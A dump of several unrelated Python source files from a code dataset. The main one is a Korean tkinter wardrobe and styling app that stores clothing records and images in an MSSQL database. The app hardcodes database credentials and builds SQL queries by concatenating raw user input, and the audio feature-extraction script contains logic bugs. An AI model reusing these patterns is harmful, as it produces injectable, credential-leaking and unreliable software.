id_list","sub_path":"TN_Data.py","file_name":"TN_Data.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"114445197","text":"from tkinter import *\nfrom tkinter.filedialog import askopenfilename\n\nimport matplotlib as plt\nimport pymssql\nimport DBConn\nimport printM\nimport Search\nfrom tkinter import ttk, messagebox\nimport tempfile\nfrom PIL import Image\nimport numpy as np\nimport cv2\n\n#Global variables....\nglobal window, variable, fullFrame, canvas, paper, itemList\n\ncanvas,paper=None, None\n\nIP_ADDR = '192.168.111.130'\nDB_NAME = 'khyProject'\nUSER_NAME = 'root'\nUSER_PASS = '1234'\n\nwindow = Tk(); window.title(\"스타일링 툴(ver 0.0.1\")\nwindow.geometry(\"800x500\")\nfullFrame=Frame(window); fullFrame.pack()\n\nitemList = ['shirts', 'pants', 'shoes', 'bag'] # 0,1,2,3,4\n\n\n### Define Functions...\n\ndef getItemidx(itemName):\n itemList=['shirts', 'pants', 'shoes', 'bag'] # 0,1,2,3,4\n cnt=0\n for item in itemList:\n if item ==itemName:\n break\n cnt+=1\n return cnt\ndef sear1():\n global variable, fullFrame,listIDX, listCOMM,listCOLOR, itemList\n\n cnt=getItemidx(variable.get())\n\n con = pymssql.connect(host=IP_ADDR, user=USER_NAME, password=USER_PASS, database=DB_NAME, charset='utf8')\n cur = con.cursor()\n\n query=\"select Cloths.mainColor, Cloths.comment from Cloths where categoryType in (select idx from Category where cname ='\"+itemList[cnt]+\"')\"\n print(query)\n cur.execute(query)\n\n colorList, commentList,idxList=[],[],[]\n cnt=1\n while True:\n row = cur.fetchone()\n if row == None or row == \"\":\n break\n colorList.append(row[0])\n #cnameList.append(row[1])\n commentList.append(row[1])\n idxList.append(cnt)\n cnt+=1\n\n listIDX.delete(0, listIDX.size() - 1)\n listCOMM.delete(0, listCOMM.size() - 1)\n #listRECE.delete(0, listRECE.size() - 1)\n listCOLOR.delete(0, listCOLOR.size() - 1)\n\n\n for idx, color, comment in zip(idxList,colorList, commentList):\n listIDX.insert(END, idx)\n listCOLOR.insert(END, color)\n #listRECE.insert(END, cname)\n listCOMM.insert(END, comment)\n\n cur.close()\n con.close()\n\ndef menuSearch1():\n ######## MENU 1. 검색 ########\n\n global variable, fullFrame,listIDX, listCOMM,listCOLOR\n\n if fullFrame != None :\n fullFrame.destroy()\n\n fullFrame=Frame(window); fullFrame.pack()\n frame1 = Frame(fullFrame); frame1.pack()\n\n itemList = ['shirts', 'pants', 'shoes', 'bag'] # 0,1,2,3,4\n\n variable = StringVar(frame1)\n variable.set(itemList[0]) #initial value\n\n w=OptionMenu(frame1, variable, *itemList)\n w.pack(side=LEFT)\n btn1 = Button(frame1, text=\"검색\", command=sear1);btn1.pack(side=RIGHT)\n\n\n ####### 검색 결과 화면 ######\n frame2 = Frame(fullFrame); frame2.pack(side=TOP, expand=1)\n idx=Label(frame2, text=\"번호\");idx.pack(side=LEFT, padx=60)\n color=Label(frame2, text=\"메인 컬러\");color.pack(side=LEFT, padx=40)\n cType=Label(frame2, text=\"형식\");cType.pack(side=LEFT, padx=50)\n comment=Label(frame2, text=\"설명\");comment.pack(side=LEFT, padx=40)\n\n frame3 = Frame(fullFrame); frame3.pack(side=BOTTOM, expand=1)\n listIDX=Listbox(frame3); listIDX.pack(side=LEFT)\n listCOLOR=Listbox(frame3); listCOLOR.pack(side=LEFT)\n #listRECE = Listbox(frame3); listRECE.pack(side=LEFT)\n listCOMM= Listbox(frame3); listCOMM.pack(side=LEFT)\n\n return\ndef makeEmptyRGBList():\n\n global fullFrame, inW, inH\n\n R, G, B = [], [], [] # 초기화\n for _ in range(inH):\n tmp = []\n for _ in range(inW):\n tmp.append(0)\n R.append(tmp)\n for _ in range(inH):\n tmp = []\n for _ in range(inW):\n tmp.append(0)\n G.append(tmp)\n for _ in range(inH):\n tmp = []\n for _ in range(inW):\n tmp.append(0)\n B.append(tmp)\n return R,G,B\ndef loadImageColor(fname) :\n global window, canvas, paper, inW, inH, outW, outH, inImageR, inImageG, inImageB, outImageR, outImageG, outImageB, filename, photo,text\n\n # 파일 크기 계산\n photo = Image.open(fname)\n inW = photo.width; inH = photo.height\n\n ### inImageR, G, B 초기화 to Numpy\n inImageR = np.zeros((inH, inW), dtype=np.uint8)\n inImageG = np.zeros((inH, inW), dtype=np.uint8)\n inImageB = np.zeros((inH, inW), dtype=np.uint8)\n\n # 파일 --> 메모리로 한개씩 옮기기\n text=\"\"\n photoRGB = photo.convert('RGB')\n for i in range(inH) :\n for k in range(inW) :\n r, g, b = photoRGB.getpixel((k, i)) #\n inImageR[i][k] = r; inImageG[i][k] = g; inImageB[i][k] = b\n text+=\"(\"+str(r)+\",\"+str(g)+\",\"+str(b)+\")\"\n #print(str(i/inH)+\" 진행중 ...\")\n # print(inImageR[100][100],inImageG[100][100],inImageB[100][100])\n print(\"[Image loading] END...\")\n\ndef openImage() :\n global window, canvas, paper, inW, inH, outW, outH, inImageR, inImageG, inImageB, outImageR, outImageG, outImageB, filename\n filename = askopenfilename(parent=window, filetypes=((\"영상 파일\", \"*.gif;*.jpg;*.png;*.bmp;*.tif\"), (\"모든 파일\", \"*.*\")))\n if filename == \"\" or filename == None :\n return\n # 파일 --> 메모리\n loadImageColor(filename)\n\n # Input --> outPut으로 동일하게 만들기.\n equalImageColor()\ndef displayImageColor() :\n global window, canvas, paper, inW, inH, outW, outH, inImageR, inImageG, inImageB, outImageR, outImageG, outImageB, filename\n if canvas != None :\n canvas.destroy()\n\n ### 고정된 화면을 준비 ###\n VIEW_X, VIEW_Y = 512,512\n if VIEW_X >= outW or VIEW_Y >= outH : # 원영상이 256이하면\n VIEW_X = outW; VIEW_Y = outH\n step = 1\n else:\n if outW > outH:\n step = outW // VIEW_X\n else:\n step = outH // VIEW_Y\n\n window.geometry(str(int(VIEW_X*1.1)) + 'x' + str(int(VIEW_Y*1.1)))\n canvas = Canvas(window, height=VIEW_Y, width=VIEW_X)\n paper = PhotoImage(height=VIEW_Y, width=VIEW_X)\n canvas.create_image((VIEW_X / 2, VIEW_Y / 2), image=paper, state='normal')\n\n rgbString = '' # 여기에 전체 픽셀 문자열을 저장할 계획\n for i in np.arange(0, outH, step) :\n tmpString = ''\n for k in np.arange(0, outW, step) :\n r, g, b = outImageR[i][k], outImageG[i][k], outImageB[i][k],\n tmpString += ' #%02x%02x%02x' % (r, g, b)\n rgbString += '{' + tmpString + '} '\n paper.put(rgbString)\n canvas.pack(expand=1, anchor=CENTER)\n status.configure(text='이미지 정보:' + str(outW) + 'x' + str(outH))\n\ndef equalImageColor() :\n global window, canvas, paper, inW, inH, outW, outH, inImageR, inImageG, inImageB, outImageR, outImageG, outImageB, filename\n\n # outImage의 크기를 결정\n outH = inH; outW = inW\n # 빈 메모리 확보 (2차원 리스트)\n outImageR, outImageG, outImageB = makeEmptyRGBList()\n\n #### 영상 처리 알고리즘을 구현 ####\n for i in range(inH) :\n for k in range(inW) :\n outImageR[i][k] = inImageR[i][k]\n outImageG[i][k] = inImageG[i][k]\n outImageB[i][k] = inImageB[i][k]\n ################################\n displayImageColor()\n\n\ndef addCloths():\n global variable,fullFrame,variable,ent1,ent2, w, inW, inH, outW, outH, inImageR, inImageG, inImageB, outImageR, outImageG, outImageB, filename,text\n\n con = pymssql.connect(host=IP_ADDR, user=USER_NAME, password=USER_PASS, database=DB_NAME,charset='utf8')\n cur = con.cursor()\n cnt=getItemidx(variable.get())\n\n\n categoryType=str(cnt+1)\n mC=str(ent1.get())\n comment=str(ent2.get())\n\n query=\"insert into Cloths(mainColor, categoryType, comment) values('\"+mC+\"', \"+categoryType+\", '\"+comment+\"')\"\n\n cur.execute(query)\n print(query)\n\n query = \"select max(idx) from Cloths\"\n cur.execute(query)\n maxIdx=str(cur.fetchone()[0])\n\n query = \"insert into Image(cloth_idx, width, height, imageInfo) values(\"+maxIdx+\", \"+str(inW)+\", \"+str(inH)+\",'\"+text+\"')\"\n\n cur.execute(query)\n\n\n cur.close()\n con.commit()\n con.close()\ndef menuAdd1():\n ######## MENU 2. 추가 ########\n\n global variable,fullFrame,variable,ent1,ent2,w\n\n if fullFrame != None:\n fullFrame.destroy()\n\n\n fullFrame=Frame(window); fullFrame.pack()\n\n\n frame1 = Frame(fullFrame); frame1.pack(side=TOP)\n\n itemList = ['shirts', 'pants', 'shoes', 'bag'] # 0,1,2,3,4\n\n variable = StringVar(frame1)\n variable.set(itemList[0]) #initial value\n\n w=OptionMenu(frame1, variable, *itemList)\n w.pack(side=LEFT)\n\n ent1 = Entry(frame1); ent1.pack(side=LEFT, padx=10) #input Main color\n ent2 = Entry(frame1); ent2.pack(side=LEFT, padx=10) #input comment\n\n btn1 = Button(frame1, text=\"추가\", command=addCloths);btn1.pack(side=LEFT, padx=10)\n\n\n frame2 = Frame(fullFrame); frame2.pack(side=BOTTOM)\n #label1 = Label(frame2); label1.pack()\n\n btn2 = Button(frame2, text=\"이미지 불러오기\", command=openImage); btn2.pack(side=LEFT, padx=10)\n return\ndef sear2():\n global variable, fullFrame\n con = pymssql.connect(host=IP_ADDR, user=USER_NAME, password=USER_PASS, database=DB_NAME,\n charset='utf8')\n cur = con.cursor()\n\n itemList = ['shirts', 'pants', 'shoes', 'bag'] # 0,1,2,3,4\n\n itemIdx = 0\n for item in itemList:\n if item == variable.get():\n break\n itemIdx += 1\n itemIdx+=1\n\n query=\"select items, wearDate from wearing order by wearDate desc\"\n cur.execute(query)\n rows=cur.fetchall()\n\n iList=[]\n dateList=[]\n for row in rows:\n iList.append(row[0]) ## 입은 옷 저장.\n dateList.append(row[1]) ## 입은 날짜 저장.\n\n for item in iList:\n print(item)\n\n cur.close()\n con.commit()\n con.close()\n return\ndef menuPrice():\n ######## MENU 3. 옷 정보 검색-가격 ########\n\n global variable, fullFrame\n\n if fullFrame != None:\n fullFrame.destroy()\n\n fullFrame = Frame(window);\n fullFrame.pack()\n frame1 = Frame(fullFrame);\n frame1.pack()\n\n itemList = ['shirts', 'pants', 'shoes', 'bag'] # 0,1,2,3,4\n\n variable = StringVar(frame1)\n variable.set(itemList[0]) # initial value\n\n w = OptionMenu(frame1, variable, *itemList)\n w.pack(side=LEFT)\n btn1 = Button(frame1, text=\"검색\", command=sear2);\n btn1.pack(side=RIGHT)\n\n # print(variable.get())\n\n ####### 검색 결과 화면 ######\n frame2 = Frame(fullFrame);\n frame2.pack(side=TOP, expand=1)\n idx = Label(frame2, text=\"번호\");idx.pack(side=LEFT, padx=60)\n comm = Label(frame2, text=\"설명\");comm.pack(side=LEFT, padx=40)\n rece = Label(frame2, text=\"최근 착용일\");rece.pack(side=LEFT, padx=50)\n image = Label(frame2, text=\"가격\");image.pack(side=LEFT, padx=40)\n\n frame3 = Frame(fullFrame);\n frame3.pack(side=BOTTOM, expand=1)\n listIDX = Listbox(frame3);\n listIDX.pack(side=LEFT)\n listCOMM = Listbox(frame3);\n listCOMM.pack(side=LEFT)\n listRECE = Listbox(frame3);\n listRECE.pack(side=LEFT)\n listImage = Listbox(frame3);\n listImage.pack(side=LEFT)\n\n return\ndef menuRecent():\n ######## MENU 3. 옷 정보 검색 - 최근 착용일 ########\n global variable, fullFrame, sheet, rows, window2\n\n if fullFrame != None:\n fullFrame.destroy()\n\n fullFrame = Frame(window);\n fullFrame.pack()\n\n con = pymssql.connect(host=IP_ADDR, user=USER_NAME, password=USER_PASS, database=DB_NAME,charset='utf8')\n cur = con.cursor()\n\n query=\"select items from Wearing order by wearDate Desc\"\n cur.execute(query)\n\n rows=cur.fetchall()\n\n ## 새로운 윈도창 띄우기\n window2 = Toplevel(fullFrame)\n sheet = ttk.Treeview(window2, height=10);\n sheet.pack()\n descs = cur.description\n colNames = [d[0] for d in descs]\n sheet.column(\"#0\", width=80);\n sheet.heading(\"#0\", text=colNames[0])\n sheet[\"columns\"] = colNames[1:]\n for colName in colNames[1:]:\n sheet.column(colName, width=80);\n sheet.heading(colName, text=colName)\n\n for row in rows:\n sheet.insert('', 'end', text=row[0], values=row[1:])\n sheet.bind('', sheetDblClick)\n\n\n return\ndef sheetDblClick(event):\n global variable, fullFrame, sheet, rows, window2, inW, inH,outW, outH,imageInfo,inImageR, inImageG, inImageB, outImageR, outImageG, outImageB\n\n item = sheet.identify('item', event.x, event.y) # 'I001' ....\n entNum = int(item[1:]) - 1 ## 쿼리한 결과 리스트의 순번\n id = rows[entNum][0] ## 선택한 id\n window2.destroy()\n # DB에서 이미지를 다운로드\n con = pymssql.connect(host=IP_ADDR, user=USER_NAME, password=USER_PASS, database=DB_NAME,charset='utf8')\n cur = con.cursor()\n\n sql = \"SELECT imageInfo, width, height from Image where cloth_idx=\" + str(id) # ID로 이미지 추출하기\n\n cur.execute(sql)\n row = cur.fetchone()\n cur.close()\n con.close()\n\n # 임시 폴더\n imageInfo=row[0]; inW=row[1]; inH=row[2]\n print(imageInfo)\n outImageR, outImageG, outImageB = makeEmptyRGBList()\n inImageR, inImageG, inImageB = makeEmptyRGBList()\n\n start,cnt=0,0\n for i in range(inH):\n for k in range(inW):\n newStr=\"\"\n if imageInfo[start]=='(':\n start+=1\n while imageInfo[start] != ')':\n newStr=newStr+imageInfo[start]\n start+=1\n start+=2\n print(newStr)\n r=int(newStr.split(\",\")[0]); g = int(newStr.split(\",\")[1]); b=int(newStr.split(\",\")[2])\n inImageR[i][k]=r; inImageG[i][k]=g; inImageB[i][k]=b\n outImageR[i][k]=r; outImageG[i][k]=g; outImageB[i][k]=b\n outW=inW; outH=inH\n displayImageColor()\n return\ndef getImageFromDB(width, height, imageInfo):\n global inW, inH,outW, outH, outImageR, outImageG, outImageB,window,fullFrame\n if fullFrame != None:\n fullFrame.destroy()\n print(imageInfo)\n inW=outW=width; inH=outH=height\n R,G,B=makeEmptyRGBList()\n outImageR,outImageG,outImageB=makeEmptyRGBList()\n idx=1\n #cnt=0\n for i in range(height):\n for k in range(width):\n text=\"\"\n while imageInfo[idx] != \")\":\n # cnt+=1\n # if cnt ==30 : break\n text+=imageInfo[idx]\n idx+=1\n idx+=2\n # if cnt==30 : break\n #print(text)\n tList=text.split(\",\")\n R[i][k]=int(tList[0]); G[i][k]=int(tList[1]); B[i][k]=int(tList[2])\n # if cnt==30 : break\n outImageR=R[:]; outImageG=G[:]; outImageB=B[:]\n\n ### 고정된 화면을 준비 ###\n VIEW_X, VIEW_Y = 512, 512\n if VIEW_X >= outW or VIEW_Y >= outH: # 원영상이 256이하면\n VIEW_X = outW;\n VIEW_Y = outH\n step = 1\n else:\n if outW > outH:\n step = outW // VIEW_X\n else:\n step = outH // VIEW_Y\n\n newWindow=Tk()\n newWindow.geometry(str(int(VIEW_X * 1.1)) + 'x' + str(int(VIEW_Y * 1.1)))\n canvas = Canvas(newWindow, height=VIEW_Y, width=VIEW_X)\n paper = PhotoImage(master=canvas, height=VIEW_Y, width=VIEW_X)\n canvas.create_image((VIEW_X / 2, VIEW_Y / 2), image=paper, state='normal')\n\n rgbString = '' # 여기에 전체 픽셀 문자열을 저장할 계획\n for i in np.arange(0, outH, step):\n tmpString = ''\n for k in np.arange(0, outW, step):\n r, g, b = outImageR[i][k], outImageG[i][k], outImageB[i][k]\n tmpString += ' #%02x%02x%02x' % (r, g, b)\n rgbString += '{' + tmpString + '} '\n paper.put(rgbString)\n canvas.pack(expand=1, anchor=CENTER)\n status.configure(text='이미지 정보:' + str(outW) + 'x' + str(outH))\n newWindow.mainloop()\n return\n\n\ndef menuAddStyleBook():\n ######## MENU 5. 스타일 북 ########\n global variable, fullFrame, sheet, rows, window2,inW, inH,imageInfo\n\n if fullFrame != None:\n fullFrame.destroy()\n\n fullFrame = Frame(window);fullFrame.pack(expand=1)\n frame1 = Frame(fullFrame);frame1.pack(expand=1)\n\n label1= Label(frame1, text=\"<< 필터 적용 후 스타일북에 저장하기>> \"); label1.pack(side=TOP)\n\n\n\n btn1 = Button(frame1, text=\"이미지 불러오기\", command=sear2);\n btn1.pack(side=RIGHT)\n btn2 = Button(frame1, text=\"스타일북에 저장하기\", command=sear2);btn2.pack(side=RIGHT)\n con = pymssql.connect(host=IP_ADDR, user=USER_NAME, password=USER_PASS, database=DB_NAME, charset='utf8')\n cur = con.cursor()\n\n\n query=\"select idx,mainColor, categoryType, comment from Cloths\"\n cur.execute(query)\n rows=cur.fetchall()\n\n ## 새로운 윈도창 띄우기\n window2 = Toplevel(window); window2.geometry(\"600x600\")\n sheet = ttk.Treeview(window2);sheet.pack(expand=1)\n descs = cur.description\n colNames = [d[0] for d in descs]\n sheet.column(\"#0\", width=80);\n sheet.heading(\"#0\", text=colNames[0])\n sheet[\"columns\"] = colNames[1:]\n for colName in colNames[1:]:\n sheet.column(colName, width=200);\n sheet.heading(colName, text=colName)\n for row in rows:\n sheet.insert('', 'end', text=row[0], values=row[1:])\n sheet.bind('', sheetDblClick)\n\n cur.close()\n con.close()\n\n\n\n\n return\ndef menuRemoveBG():\n global fullFrame, filename, inH, inW\n\n if fullFrame != None:\n fullFrame.destroy()\n\n fullFrame = Frame(window);\n fullFrame.pack()\n filename = askopenfilename(parent=window, filetypes=((\"영상 파일\", \"*.gif;*.jpg;*.png;*.bmp;*.tif\"), (\"모든 파일\", \"*.*\")))\n if filename == \"\" or filename == None:\n return\n\n # == Parameters =======================================================================\n BLUR = 21\n CANNY_THRESH_1 = 10\n CANNY_THRESH_2 = 200\n MASK_DILATE_ITER = 10\n MASK_ERODE_ITER = 10\n MASK_COLOR = (1.0, 1.0, 1.0) # In BGR format\n\n # == Processing =======================================================================\n\n # -- Read image -----------------------------------------------------------------------\n img = cv2.imread(filename)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # -- Edge detection -------------------------------------------------------------------\n edges = cv2.Canny(gray, CANNY_THRESH_1, CANNY_THRESH_2)\n edges = cv2.dilate(edges, None)\n edges = cv2.erode(edges, None)\n\n # -- Find contours in edges, sort by area ---------------------------------------------\n contour_info = []\n #_, contours, _ = cv2.findContours(edges, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)\n # Previously, for a previous version of cv2, this line was:\n contours, _ = cv2.findContours(edges, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)\n # Thanks to notes from commenters, I've updated the code but left this note\n for c in contours:\n contour_info.append((\n c,\n cv2.isContourConvex(c),\n cv2.contourArea(c),\n ))\n contour_info = sorted(contour_info, key=lambda c: c[2], reverse=True)\n max_contour = contour_info[0]\n\n # -- Create empty mask, draw filled polygon on it corresponding to largest contour ----\n # Mask is black, polygon is white\n mask = np.zeros(edges.shape)\n cv2.fillConvexPoly(mask, max_contour[0], (255))\n\n # -- Smooth mask, then blur it --------------------------------------------------------\n mask = cv2.dilate(mask, None, iterations=MASK_DILATE_ITER)\n mask = cv2.erode(mask, None, iterations=MASK_ERODE_ITER)\n mask = cv2.GaussianBlur(mask, (BLUR, BLUR), 0)\n mask_stack = np.dstack([mask] * 3) # Create 3-channel alpha mask\n\n # -- Blend masked img into MASK_COLOR background --------------------------------------\n mask_stack = mask_stack.astype('float32') / 255.0 # Use float matrices,\n img = img.astype('float32') / 255.0 # for easy blending\n\n masked = (mask_stack * img) + ((1 - mask_stack) * MASK_COLOR) # Blend\n masked = (masked * 255).astype('uint8') # Convert back to 8-bit\n\n cv2.imshow('img',masked) # Display\n cv2.imwrite('C:/Users/B-17/Desktop/DB project/afterImages/person-masked.jpg', masked)# Save\ndef menuPrint():\n ######## MENU 6. 프린트하기 ########\n\n\n printM.printFile()\n\n\ndef sheetDblClick2(event):\n global variable, fullFrame, sheet, rows, window2, inW, inH,outW, outH,imageInfo,inImageR, inImageG, inImageB, outImageR, outImageG, outImageB\n\n item = sheet.identify('item', event.x, event.y) # 'I001' ....\n entNum = int(item[1:]) - 1 ## 쿼리한 결과 리스트의 순번\n id = rows[entNum][0] ## 선택한 id\n window2.destroy()\n # DB에서 이미지를 다운로드\n con = pymssql.connect(host=IP_ADDR, user=USER_NAME, password=USER_PASS, database=DB_NAME,charset='utf8')\n cur = con.cursor()\n\n sql= \"select items from Wearing where idx=\"+str(id)\n print(sql)\n cur.execute(sql)\n row = cur.fetchone()\n\n itemList=row[0].split(\",\")\n imgCnt=len(itemList)\n print(imgCnt)\n\n for item in itemList:\n print(\"item : \", item)\n query=\"select width, height, imageInfo, cloth_idx from Image where cloth_idx=\"+item\n #print(query)\n cur.execute(query)\n row=cur.fetchone()\n getImageFromDB(row[0], row[1], row[2])\n\n\n\n\n cur.close()\n con.close()\n\n return\n\ndef menuCallStyle():\n global variable, fullFrame, sheet, rows, window2\n\n if fullFrame != None:\n fullFrame.destroy()\n\n fullFrame = Frame(window);\n fullFrame.pack()\n\n con = pymssql.connect(host=IP_ADDR, user=USER_NAME, password=USER_PASS, database=DB_NAME, charset='utf8')\n cur = con.cursor()\n\n query = \"select idx, wearDate from Wearing order by wearDate Desc\"\n cur.execute(query)\n\n rows = cur.fetchall()\n\n ## 새로운 윈도창 띄우기\n window2 = Toplevel(fullFrame)\n sheet = ttk.Treeview(window2, height=10);\n sheet.pack()\n descs = cur.description\n colNames = [d[0] for d in descs]\n sheet.column(\"#0\", width=80);\n sheet.heading(\"#0\", text=colNames[0])\n sheet[\"columns\"] = colNames[1:]\n for colName in colNames[1:]:\n sheet.column(colName, width=80);\n sheet.heading(colName, text=colName)\n\n for row in rows:\n sheet.insert('', 'end', text=row[0], values=row[1:])\n sheet.bind('', sheetDblClick2)\n\n return\n\n\n######## Main Menu ########\nmainMenu = Menu(window)\nwindow.config(menu=mainMenu)\n\n## Status Bar 추가\nstatus = Label(window, text='이미지 정보:', bd=1, relief=SUNKEN, anchor=W)\nstatus.pack(side=BOTTOM, fill=X)\n\n######## MENU 1. 검색 ########\nsearchMenu = Menu(mainMenu)\nmainMenu.add_cascade(label = \"검색\", menu=searchMenu)\n\nsearchMenu.add_cascade(label=\"옷장 검색\", command=menuSearch1)\n\n######## MENU 2. 추가 ########\naddMenu = Menu(mainMenu)\nmainMenu.add_cascade(label = \"추가\", menu=addMenu)\n\naddMenu.add_cascade(label=\"옷 추가하기\", command=menuAdd1)\n\n######## MENU 3. 옷 정보 검색 ########\nclothsMenu = Menu(mainMenu)\nmainMenu.add_cascade(label = \"옷 정보\", menu=clothsMenu)\n\nclothsMenu.add_cascade(label=\"가격 정보 검색\", command=menuPrice)\nclothsMenu.add_cascade(label=\"최근 착용일 검색\", command=menuRecent)\n\n######## MENU 4. 스타일링 ########\n# styleMenu = Menu(mainMenu)\n#\n# sMenu=Menu(styleMenu)\n#\n# mainMenu.add_cascade(label = \"스타일링\", menu=styleMenu)\n# styleMenu.add_cascade(label=\"action\", menu=sMenu, command=None)\n# sMenu.add_cascade(label = \"스타일링\", command=None)\n# sMenu.add_cascade(label = \"옷 색상 바꾸기\", command=None)\n\n######## MENU 5. 스타일 북 ########\nstyleBookMenu = Menu(mainMenu)\n\naddStyleMenu=Menu(styleBookMenu)\n\nmainMenu.add_cascade(label = \"스타일 북\", menu=styleBookMenu)\nstyleBookMenu.add_command(label=\"추가하기\", command=menuAddStyleBook)\nstyleBookMenu.add_command(label=\"스타일 불러오기\", command=menuCallStyle)\n\nstyleBookMenu.add_cascade(label=\"필터 적용하기\", menu=addStyleMenu)\naddStyleMenu.add_cascade(label =\"필터1\", command=menuAddStyleBook)\naddStyleMenu.add_cascade(label =\"필터2\", command=None)\n\n######## MENU 6. 프린트하기 ########\nprintMenu = Menu(mainMenu)\n\nmainMenu.add_cascade(label=\"프린트하기\", menu=printMenu)\nprintMenu.add_cascade(label=\"프린트하기\", command=menuPrint) # filename 전달하기.\n\n\n######## MENU 7. Image Processing ########\nimageMenu = Menu(mainMenu)\n\nmainMenu.add_cascade(label=\"이미지 프로세싱\", menu=imageMenu)\nimageMenu.add_cascade(label=\"배경제거\", command=menuRemoveBG) # filename 전달하기.\n\nwindow.mainloop()","sub_path":"mysql-python/MyProject/ver02-fileOpen2Cv.py","file_name":"ver02-fileOpen2Cv.py","file_ext":"py","file_size_in_byte":24335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"578944243","text":"from unittest import TestCase, skip\nfrom sys import stdout\nimport os.path\nimport logging\nimport traceback\nimport numpy as np\nimport OpenGL\nOpenGL.ERROR_CHECKING = False\nOpenGL.ERROR_LOGGING = False\nOpenGL.ERROR_ON_COPY = True\nimport OpenGL.GL as gl\nimport cyglfw3 as glfw\n\n\n_logger = logging.getLogger(__name__)\n\n\nfrom poolvr.cue import PoolCue\nfrom poolvr.table import PoolTable\nfrom poolvr.gl_rendering import OpenGLRenderer, Texture, Material, Mesh\nfrom poolvr.techniques import EGA_TECHNIQUE, LAMBERT_TECHNIQUE\nfrom poolvr.app import setup_glfw, BG_COLOR, TEXTURES_DIR\nfrom poolvr.billboards import BillboardParticles\nfrom poolvr.keyboard_controls import init_keyboard\nimport poolvr.primitives\n\n\nSCREENSHOTS_DIR = os.path.join(os.path.dirname(__file__), 'screenshots')\n\n\nclass OpenGLTests(TestCase):\n show = True\n\n @skip\n def test_cone_mesh(self):\n material = Material(LAMBERT_TECHNIQUE, values={'u_color': [1.0, 1.0, 0.0, 0.0]})\n mesh = poolvr.primitives.ConeMesh(material, radius=0.15, height=0.3)\n for prim in mesh.primitives[material]:\n prim.attributes['a_position'] = prim.attributes['vertices']\n mesh.world_matrix[3,2] = -3\n self._view(meshes=[mesh])\n\n\n def test_sphere_mesh(self):\n material = Material(LAMBERT_TECHNIQUE, values={'u_color': [0.0, 1.0, 1.0, 0.0]})\n prim = poolvr.primitives.SpherePrimitive(radius=0.1)\n prim.attributes['a_position'] = prim.attributes['vertices']\n mesh = Mesh({material: [prim]})\n mesh.world_matrix[3,2] = -3\n self._view(meshes=[mesh])\n\n\n def _view(self, meshes=None, window_size=(800,600)):\n if meshes is None:\n meshes = []\n title = traceback.extract_stack(None, 2)[0][2]\n window, renderer = setup_glfw(width=window_size[0], height=window_size[1], double_buffered=True,\n title=title)\n camera_world_matrix = renderer.camera_matrix\n camera_position = camera_world_matrix[3,:3]\n gl.glViewport(0, 0, window_size[0], window_size[1])\n gl.glClearColor(*BG_COLOR)\n gl.glEnable(gl.GL_DEPTH_TEST)\n for mesh in meshes:\n mesh.init_gl(force=True)\n def on_resize(window, width, height):\n gl.glViewport(0, 0, width, height)\n renderer.window_size = (width, height)\n renderer.update_projection_matrix()\n glfw.SetWindowSizeCallback(window, on_resize)\n process_keyboard_input = init_keyboard(window)\n\n _logger.info('entering render loop...')\n stdout.flush()\n\n nframes = 0\n max_frame_time = 0.0\n lt = glfw.GetTime()\n while not glfw.WindowShouldClose(window):\n t = glfw.GetTime()\n dt = t - lt\n lt = t\n glfw.PollEvents()\n renderer.process_input()\n process_keyboard_input(dt, camera_world_matrix)\n with renderer.render(meshes=meshes):\n pass\n max_frame_time = max(max_frame_time, dt)\n if nframes == 0:\n st = glfw.GetTime()\n nframes += 1\n glfw.SwapBuffers(window)\n\n _logger.info('...exited render loop: average FPS: %f, maximum frame time: %f',\n (nframes - 1) / (t - st), max_frame_time)\n\n renderer.shutdown()\n _logger.info('...shut down renderer')\n glfw.DestroyWindow(window)\n glfw.Terminate()\n","sub_path":"test/opengl_tests.py","file_name":"opengl_tests.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"95885060","text":"import argparse\nfrom common.param.FeatureExtractor import FeatureExtractor\nfrom common.config.Configuration import get_parameters\n\nparser = argparse.ArgumentParser(description='extract features from the training data')\nparser.add_argument('feature_configuration', help='feature configuration file')\nparser.add_argument('--raw', dest='raw_audio', help='file containing samples of raw audio')\nparser.add_argument('--fea', dest='output_features', help='file where features will be written to')\nparser.add_argument('--bat', dest='batch', help='batch file containing pairs [rawFile featureFile]')\nparser.add_argument('--wrp', dest='warp_factor', type=float, default=1.0, help='warp factor')\nparser.add_argument('--nrm', dest='cepstral_normalization_mode', choices=['none', 'utterance', 'session'],\n default='utterance', help='cepstral normalization mode')\nparser.add_argument('--met', dest='cepstral_normalization_method', choices=['CMN', 'CMVN'], default='CMN',\n help='cepstral normalization method')\nparser.add_argument('--hlt', dest='halt', default=False, const=True, action='store_const',\n help='whether to halt the batch processing if an error is found')\nargs = parser.parse_args()\n\nif args.batch and (args.raw_audio or args.output_features):\n raise ValueError('')\nelif args.raw_audio and not args.output_features:\n raise ValueError('')\nelif args.output_features and not args.raw_audio:\n raise ValueError('')\nelif not args.batch:\n raise ValueError('')\n\n# get the parameters\n\n# load the configuration file\nconfiguration_features = get_parameters(args.feature_configuration, 'features.json')\n\n# perform the parameterization\n \n# load the parameters\ncepstral_buffer_size = -1\nfeature_extractor = FeatureExtractor(configuration_features, args.warp_factor, cepstral_buffer_size,\n args.cepstral_normalization_mode, args.cepstral_normalization_method)\n\nif not args.bat:\n feature_extractor.extract_features(args.raw_audio, args.output_features)\nelse:\n feature_extractor.extract_features_batch(args.batch, args.halt)","sub_path":"tools/mainParam.py","file_name":"mainParam.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"574677596","text":"#!/usr/bin/env python3\nimport sys\nimport csv\nimport os\nimport time\nfrom multiprocessing import Process,Queue\n\n\n\nclass Args(object):\n def __init__(self):\n self.args = sys.argv[1:]\n self.get_args(self.args)\n\n def get_args(self,line_args):\n #mytmp_list = []\n try:\n index = line_args.index('-c')\n self.config_file = line_args[index+1]\n except ValueError:\n print(\"args -c error!\")\n exit(-1)\n\n #mytmp_list.append(self.config_file)\n try:\n index = line_args.index('-d')\n self.user_file = line_args[index+1]\n except ValueError:\n print(\"args -d 